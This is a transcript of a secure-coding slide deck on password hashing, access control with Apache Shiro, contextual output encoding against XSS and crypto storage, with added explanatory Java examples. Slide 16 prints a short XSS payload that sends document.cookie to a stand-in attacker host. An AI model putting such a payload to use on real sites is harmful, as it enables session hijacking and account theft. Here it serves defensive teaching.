
Security presentation from Jim Manico

Michael Isvy

August 08, 2014

Transcript

  1. Password Storage, XSS Defense and Access Control Design

  2. Jim Manico
    @manicode
    OWASP Volunteer
    - Global OWASP Board Member
    - OWASP Cheat-Sheet Series, Top Ten Proactive Controls, OWASP Java Encoder and HTML Sanitizer Project Manager and Contributor
    Secure-Coding Instructor/Author
    - 18 years of web-based, database-driven software development and analysis experience
    - Author of "Iron Clad Java, Building Secure Web Applications" with Oracle Press and McGraw Hill (Sept 2014)
    Kama'aina Resident of Kauai, Hawaii
    - Aloha!

  3. Authentication and Identity

  4. Password Storage Defense Overview
    • Offline Attacks
      – Avoid Hashing or Encryption
      – Use proper key derivation functions and stretching configurations
      – Use random and unique per-user salts
        • Less effective against targeted attacks, but use them anyhow
      – Strict Password Policy
    • Online Attacks
      – Ban top X commonly used passwords
      – Rate limiting
      – Multi-factor authentication
      – Behavior Analysis
    • Trojan Combat
      – Anti-Phishing
        • Early detection and takedown
      – Good network security
    Reference: Openwall and http://www.openwall.com/presentations

  5. Password Storage in the Real World
    1) Do not limit the type of characters or length of user password within reason
    • Limiting passwords to protect against injection is doomed to failure
    • Use proper encoder and other defenses described instead
    • Be wary of systems that allow unlimited password sizes (Django DOS Sept 2013)

  6. Password Storage in the Real World
    2) Use a cryptographically strong credential-specific salt
    • protect( [salt] + [password] );
    • Use a 32-char or 64-char salt (actual size dependent on protection function)
    • Do not depend on hiding, splitting, or otherwise obscuring the salt

  7. Password Storage in the Real World
    3a) Impose difficult verification on the attacker and defender
    • PBKDF2([salt] + [password], c=10,000,000);
    • Use PBKDF2 when FIPS certification or enterprise support on many platforms is required
    • Use scrypt where resisting any/all hardware-accelerated attacks is necessary but enterprise support and scale is not (bcrypt is also a reasonable choice)

  8. Java 7 PBKDF2
    import java.security.NoSuchAlgorithmException;
    import java.security.spec.InvalidKeySpecException;
    import javax.crypto.SecretKeyFactory;
    import javax.crypto.spec.PBEKeySpec;

    // Derives keyLength bits from password and salt by iterating the HMAC-SHA1 PRF iterationCount times.
    static byte[] pbkdf2(final char[] password, final byte[] salt,
                         final int iterationCount, final int keyLength) {
        try {
            return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1")
                .generateSecret(
                    new PBEKeySpec(password, salt, iterationCount, keyLength)
                ).getEncoded();
        } catch (NoSuchAlgorithmException | InvalidKeySpecException e) {
            throw new RuntimeException(e);
        }
    }
    keyLength: 2048
    iterationCount: 128,000 (2014)

  9. Password1!

  10. Multi Factor Authentication
    Google, Facebook, PayPal, Apple, AWS, Dropbox, Twitter
    Blizzard's Battle.Net, Valve's Steam, Yahoo

  11. Access Control

  12. Most Coders Hard-Code Roles in Code
    if ( user.isRole( "JEDI" ) ||
         user.isRole( "PADWAN" ) ||
         user.isRole( "SITH_LORD" ) ||
         user.isRole( "JEDI_KILLING_CYBORG" )
    ) {
        log.info("You may use a lightsaber ring.  Use it wisely.");
    } else {
        log.info("Lightsaber rings are for schwartz masters.");
    }

  13. Solving Real World Access Control Problems with Apache Shiro
    The Problem
    Web application needs a secure access control mechanism
    The Solution
    if ( currentUser.isPermitted( "lightsaber:wield" ) ) {
        log.info("You may use a lightsaber ring.  Use it wisely.");
    } else {
        log.info("Sorry, lightsaber rings are for schwartz masters only.");
    }

  14. Solving Real World Access Control Problems with Apache Shiro
    The Problem
    Web application needs to secure access to a specific object
    The Solution
    int winnebagoId = request.getInt("winnebago_id");

    if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) {
        log.info("You are permitted to 'drive' the 'winnebago'.  Here are the keys.");
    } else {
        log.info("Sorry, you aren't allowed to drive this winnebago!");
    }
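To make the contrast between slides 12 and 14 concrete, the following added example (not Shiro's code and not from the deck) sketches how `resource:action:instance` permission strings with `*` wildcards can be evaluated against a role-to-permission mapping that lives in data rather than in `if` statements. The `ROLE_PERMISSIONS` map, the `implies` rules and the `isPermitted` helper are constructed for this illustration and only approximate Shiro's wildcard-permission semantics; it assumes Java 9 or later for `Map.of` and `List.of`.

```java
import java.util.Arrays;
import java.util.List;
import java.util.Map;
import java.util.Set;

// Toy permission model constructed for this example (not Apache Shiro's implementation).
// Permissions are "resource:action:instance" strings; '*' matches any value in that position.
public final class PermissionCheck {

    // Constructed sample mapping of roles to permission strings. In a real system this is data
    // (database, config, identity provider), so adding a role never requires a code change.
    static final Map<String, List<String>> ROLE_PERMISSIONS = Map.of(
        "JEDI",     List.of("lightsaber:wield", "winnebago:drive:7"),
        "MECHANIC", List.of("winnebago:repair:*"),
        "TOURIST",  List.<String>of());

    // Does a granted permission imply the requested one? Compare part by part; a granted '*'
    // matches anything. A grant with fewer parts than the request covers all sub-parts
    // ("winnebago:drive" implies "winnebago:drive:7"); a grant with more parts than the request
    // only implies it if every extra part is '*' ("winnebago:drive:7" does not imply "winnebago:drive").
    static boolean implies(String granted, String requested) {
        String[] g = granted.split(":");
        String[] r = requested.split(":");
        for (int i = 0; i < r.length; i++) {
            if (i >= g.length) return true;
            if (!g[i].equals("*") && !g[i].equals(r[i])) return false;
        }
        return Arrays.stream(g, r.length, g.length).allMatch("*"::equals);
    }

    // Any permission carried by any of the user's roles may grant the request.
    static boolean isPermitted(Set<String> roles, String requested) {
        return roles.stream()
                .flatMap(role -> ROLE_PERMISSIONS.getOrDefault(role, List.of()).stream())
                .anyMatch(granted -> implies(granted, requested));
    }

    public static void main(String[] args) {
        Set<String> jedi = Set.of("JEDI");
        Set<String> mechanic = Set.of("MECHANIC");
        int winnebagoId = 7;   // on the slide this comes from request.getInt("winnebago_id")
        System.out.println("jedi wields lightsaber: " + isPermitted(jedi, "lightsaber:wield"));
        System.out.println("jedi drives winnebago " + winnebagoId + ": "
                + isPermitted(jedi, "winnebago:drive:" + winnebagoId));
        System.out.println("jedi drives winnebago 8: " + isPermitted(jedi, "winnebago:drive:8"));
        System.out.println("mechanic repairs any winnebago: " + isPermitted(mechanic, "winnebago:repair:42"));
        System.out.println("mechanic drives winnebago 7: " + isPermitted(mechanic, "winnebago:drive:7"));
        // An instance-scoped grant does not imply the action on every instance.
        System.out.println("jedi drives every winnebago: " + isPermitted(jedi, "winnebago:drive"));
    }
}
```

The code path that checks `"winnebago:drive:" + winnebagoId` never changes when a new role or a new vehicle appears; only the data in `ROLE_PERMISSIONS` does, which is the design point the slide makes against the hard-coded role list.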

  15. Spring Solution to Stop XSS?

  16. Anatomy of an XSS Attack
    var badURL='https://evileviljim.com/somesite/data=' + document.cookie;
    var img = new Image();
    img.src = badURL;
    document.body.innerHTML='<blink>CYBER IS COOL</blink>';

  17. Contextual Output Encoding (XSS Defense)
    – Session Hijacking
    – Site Defacement
    – Network Scanning
    – Undermining CSRF Defenses
    – Site Redirection/Phishing
    – Load of Remotely Hosted Scripts
    – Data Theft
    – Keystroke Logging
    – Attackers using XSS more frequently

  18. XSS Defense by Data Type and Context
    Data Type            | Context           | Defense
    String               | HTML Body         | HTML Entity Encode
    String               | HTML Attribute    | Minimal Attribute Encoding
    String               | GET Parameter     | URL Encoding
    String               | Untrusted URL     | URL Validation, avoid javascript: URLs, Attribute encoding, safe URL verification
    String               | CSS               | Strict structural validation, CSS Hex encoding, good design
    HTML                 | HTML Body         | HTML Validation (JSoup, AntiSamy, HTML Sanitizer)
    Any                  | DOM               | DOM XSS Cheat Sheet
    Untrusted JavaScript | Any               | Sandboxing
    JSON                 | Client Parse Time | JSON.parse() or json2.js
    Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width
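The table's point is that the same string needs a different encoding in each output context. The added example below (not part of the deck, and not the OWASP Java Encoder's implementation) hand-rolls three of the encoders from the table to show what each one must neutralise. The method names mirror the `Encode` API but the bodies and the untrusted input are constructed for this illustration; in real code use the project's `Encode.forHtmlContent`, `Encode.forHtmlUnquotedAttribute` and `Encode.forUriComponent`.

```java
import java.nio.charset.StandardCharsets;

// Hand-rolled encoders constructed for this example to show what each output context requires.
// Not the OWASP Java Encoder's code; use that library in production.
public final class ContextualEncoding {

    // HTML body context (also safe inside a quoted attribute, because both quote characters are
    // encoded): neutralise the characters that can start a tag or entity or close a quoted value.
    static String forHtmlContent(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;"); break;
                case '<':  out.append("&lt;");  break;
                case '>':  out.append("&gt;");  break;
                case '"':  out.append("&#34;"); break;
                case '\'': out.append("&#39;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Unquoted attribute context: whitespace, '=' and '/' also end the value, so the safe set
    // shrinks to letters and digits; everything else becomes a numeric character reference.
    static String forHtmlUnquotedAttribute(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        s.codePoints().forEach(cp -> {
            boolean alnum = (cp >= 'a' && cp <= 'z') || (cp >= 'A' && cp <= 'Z') || (cp >= '0' && cp <= '9');
            if (alnum) out.appendCodePoint(cp); else out.append("&#").append(cp).append(';');
        });
        return out.toString();
    }

    // URL query-parameter context: percent-encode every UTF-8 byte outside the unreserved set,
    // so the value cannot introduce a new parameter, path segment or scheme.
    static String forUriComponent(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (byte b : s.getBytes(StandardCharsets.UTF_8)) {
            int v = b & 0xFF;
            boolean unreserved = (v >= 'a' && v <= 'z') || (v >= 'A' && v <= 'Z') || (v >= '0' && v <= '9')
                    || v == '-' || v == '.' || v == '_' || v == '~';
            if (unreserved) out.append((char) v); else out.append(String.format("%%%02X", v));
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Constructed untrusted input that tries to close an attribute value and inject markup.
        String untrusted = "\" onmouseover=alert(1) x=\"<script>";
        System.out.println("<p>" + forHtmlContent(untrusted) + "</p>");
        System.out.println("<input value=\"" + forHtmlContent(untrusted) + "\">");
        System.out.println("<input value=" + forHtmlUnquotedAttribute(untrusted) + ">");
        System.out.println("/search?q=" + forUriComponent(untrusted));
    }
}
```

Running it shows why the table calls attribute encoding "minimal" only for quoted attributes: in the unquoted case a single space in the output would start a new attribute, so the encoder has to be far more aggressive than the HTML-body one.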

  19. OWASP Java Encoder Project
    https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
    • No third party libraries or configuration necessary
    • This code was designed for high-availability/high-performance encoding functionality
    • Simple drop-in encoding functionality
    • Redesigned for performance
    • More complete API (uri and uri component encoding, etc.) in some regards.
    • Java 1.5+
    • Last updated February 14, 2013 (version 1.1)

  20. OWASP Java Encoder Project
    https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
    HTML Contexts
    Encode#forHtmlContent(String)
    Encode#forHtmlAttribute(String)
    Encode#forHtmlUnquotedAttribute(String)
    XML Contexts
    Encode#forXml(String)
    Encode#forXmlContent(String)
    Encode#forXmlAttribute(String)
    Encode#forXmlComment(String)
    Encode#forCDATA(String)
    CSS Contexts
    Encode#forCssString(String)
    Encode#forCssUrl(String)
    JavaScript Contexts
    Encode#forJavaScript(String)
    Encode#forJavaScriptAttribute(String)
    Encode#forJavaScriptBlock(String)
    Encode#forJavaScriptSource(String)
    URI/URL contexts
    Encode#forUri(String)
    Encode#forUriComponent(String)

  21. HTML Body Escaping Examples
    OWASP Java Encoder
    <%= Encode.forHtml(UNTRUSTED) %>
    Title:<%= Encode.forHtml(UNTRUSTED) %>
    <%= Encode.forHtmlContent(UNTRUSTED) %>

  22. HTML Attribute Escaping Examples
    OWASP Java Encoder
    value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" />
    value=<%= Encode.forHtmlUnquotedAttribute(UNTRUSTED) %> />

  23. URL Parameter Escaping Examples
    OWASP Java Encoder
    <%-- Encode URL parameter values --%>

    <%-- Encode REST URL parameters --%>

  24. Handling Untrusted URLs
    1) First validate to ensure the string is a valid URL
    2) Avoid javascript: URLs
    3) Only allow HTTP or HTTPS
    4) Check the URL for malware inbound and outbound
    5) Encode URL in the right context of display
    UNTRUSTED URL

  25. Validating Untrusted URLs
    public static String validateURL(String rawURI, boolean absoluteURLonly)
            throws URISyntaxException, ValidationException {
        // throws URISyntaxException if the string is not a syntactically valid URI
        URI uri = new URI(rawURI);
        // don't allow relative urls WHY?
        if (absoluteURLonly) {
            if (!uri.isAbsolute()) throw new ValidationException("not an absolute uri");
        }
        // don't allow javascript: urls, data: urls, etc.
        if (!"http".equals(uri.getScheme()) && !"https".equals(uri.getScheme()))
            throw new ValidationException("we only support http(s) urls");
        // who legitimately uses user-infos in their urls?!?
        if (uri.getUserInfo() != null) throw new ValidationException("this can only be trouble");
        // normalize to get rid of '.' and '..' path components
        uri = uri.normalize();
        // check: uri.getHost() against whitelist/blacklist?
        // check: uri.getPort() for shenanigans?
        return uri.toASCIIString();
    }

  26. Escaping when managing URLs
    Assuming the untrusted URL has been properly validated....
    OWASP Java Encoder
    Encode.forHtmlContent(untrustedURL)

  27. Advanced XSS Defense With No Encoding!
    1) Deliver main HTML5 document with static/safe data only in the HTML
    2) Embed JSON on the page
    <%= Encoder.encodeForHTML(data.to_json) %>
    3) Decode and Parse JSON
    var dataElement = document.getElementById('init_data');
    var jsonText = dataElement.textContent || dataElement.innerText;
    var initData = JSON.parse(html_unescape(jsonText));
    4) Parse JSON and populate the static HTML with safe JavaScript APIs
    a) JS: .innerText .val
    b) jQuery: .text .val

  28. Validation

  29. OWASP HTML Sanitizer Project
    https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
    • HTML Sanitizer written in Java which lets you include HTML authored by third parties in your web application while protecting against XSS.
    • This code was written with security best practices in mind, has an extensive test suite, and has undergone adversarial security review: https://code.google.com/p/owasp-java-html-sanitizer/wiki/AttackReviewGroundRules
    • Very easy to use.
    • It allows for simple programmatic POSITIVE policy configuration. No XML config.
    • Actively maintained by Mike Samuel from Google's AppSec team!
    • This is code from the Caja project that was donated by Google. It has rather high performance and low memory utilization.

  30. Solving Real World Problems with the OWASP HTML Sanitizer Project
    The Problem
    Web page is vulnerable to XSS because of untrusted HTML
    The Solution
    PolicyFactory policy = new HtmlPolicyBuilder()
        .allowElements("a")
        .allowUrlProtocols("https")
        .allowAttributes("href").onElements("a")
        .requireRelNofollowOnLinks()
        .build();
    String safeHTML = policy.sanitize(untrustedHTML);

  31. Crypto Storage

  32. Solving Real World Crypto Storage Problems With Google Keyczar
    The Problem
    Web application needs to encrypt and decrypt sensitive data
    The Solution
    Crypter crypter = new Crypter("/path/to/your/keys");
    String ciphertext = crypter.encrypt("Secret message");
    String plaintext = crypter.decrypt(ciphertext);
    Keyczar is an open source cryptographic toolkit for Java, designed to make it easier and safer for developers to use cryptography in their applications.
    • A simple API
    • Key rotation and versioning
    • Safe default algorithms, modes, and key lengths
    • Automated generation of initialization vectors and ciphertext signatures
    • Java implementation
    • Inferior Python and C++ support because Java is way cooler
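As an added example of the properties in the list above (not Keyczar's code and not from the deck), the following class implements them with the JDK alone: AES-GCM as the one fixed algorithm and mode, a random 96-bit IV drawn for every message, the GCM authentication tag standing in for the "ciphertext signature", and a key-version prefix on each token so ciphertexts produced before a rotation still decrypt. The class name, token layout and sample messages are constructed for the illustration.

```java
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.TreeMap;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;

// Constructed for this example (not Keyczar's code): versioned keys + AES-GCM with a fresh IV per message.
// Token layout: 4-byte key version || 12-byte IV || ciphertext || 16-byte tag, Base64-encoded.
public final class VersionedCrypter {
    private static final int IV_BYTES = 12;   // 96-bit IV, the recommended size for GCM
    private static final int TAG_BITS = 128;  // authentication tag; a modified token fails to decrypt
    private static final SecureRandom RNG = new SecureRandom();

    private final TreeMap<Integer, SecretKey> keys = new TreeMap<>(); // version -> key, all kept for decryption
    private int primary;                                              // version used for new encryptions

    // Generate a fresh AES-256 key and make it primary; older versions stay decrypt-only.
    public int rotate() throws GeneralSecurityException {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(256);
        primary = keys.isEmpty() ? 1 : keys.lastKey() + 1;
        keys.put(primary, kg.generateKey());
        return primary;
    }

    public String encrypt(String plaintext) throws GeneralSecurityException {
        byte[] iv = new byte[IV_BYTES];
        RNG.nextBytes(iv);                                   // random IV per message; never reused under one key
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, keys.get(primary), new GCMParameterSpec(TAG_BITS, iv));
        byte[] ct = cipher.doFinal(plaintext.getBytes(StandardCharsets.UTF_8)); // ciphertext with tag appended
        ByteBuffer buf = ByteBuffer.allocate(4 + IV_BYTES + ct.length);
        buf.putInt(primary).put(iv).put(ct);
        return Base64.getEncoder().encodeToString(buf.array());
    }

    public String decrypt(String token) throws GeneralSecurityException {
        byte[] raw = Base64.getDecoder().decode(token);
        if (raw.length < 4 + IV_BYTES + TAG_BITS / 8) throw new GeneralSecurityException("token too short");
        ByteBuffer buf = ByteBuffer.wrap(raw);
        int version = buf.getInt();
        SecretKey key = keys.get(version);                   // the header selects the key, old or current
        if (key == null) throw new GeneralSecurityException("unknown key version " + version);
        byte[] iv = new byte[IV_BYTES];
        buf.get(iv);
        byte[] ct = new byte[buf.remaining()];
        buf.get(ct);
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(TAG_BITS, iv));
        return new String(cipher.doFinal(ct), StandardCharsets.UTF_8); // AEADBadTagException if tampered
    }

    public static void main(String[] args) throws GeneralSecurityException {
        VersionedCrypter crypter = new VersionedCrypter();
        crypter.rotate();
        String oldToken = crypter.encrypt("Secret message");  // constructed sample
        crypter.rotate();                                     // new primary key; old token stays readable
        String newToken = crypter.encrypt("Secret message");
        System.out.println(crypter.decrypt(oldToken) + " / " + crypter.decrypt(newToken));
        // Flip one ciphertext bit: the tag check rejects the token instead of returning corrupted plaintext.
        byte[] tampered = Base64.getDecoder().decode(newToken);
        tampered[tampered.length - 1] ^= 0x01;
        try {
            crypter.decrypt(Base64.getEncoder().encodeToString(tampered));
        } catch (GeneralSecurityException e) {
            System.out.println("rejected: " + e.getClass().getSimpleName());
        }
    }
}
```

The version header is what makes rotation operationally cheap: new writes move to the new key immediately, and old records can be re-encrypted in the background while remaining readable, which is the same idea the slide credits to Keyczar's key versioning.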

  33. @manicode
    [email protected]
    http://slideshare.net/jimmanico
    THANK YOU!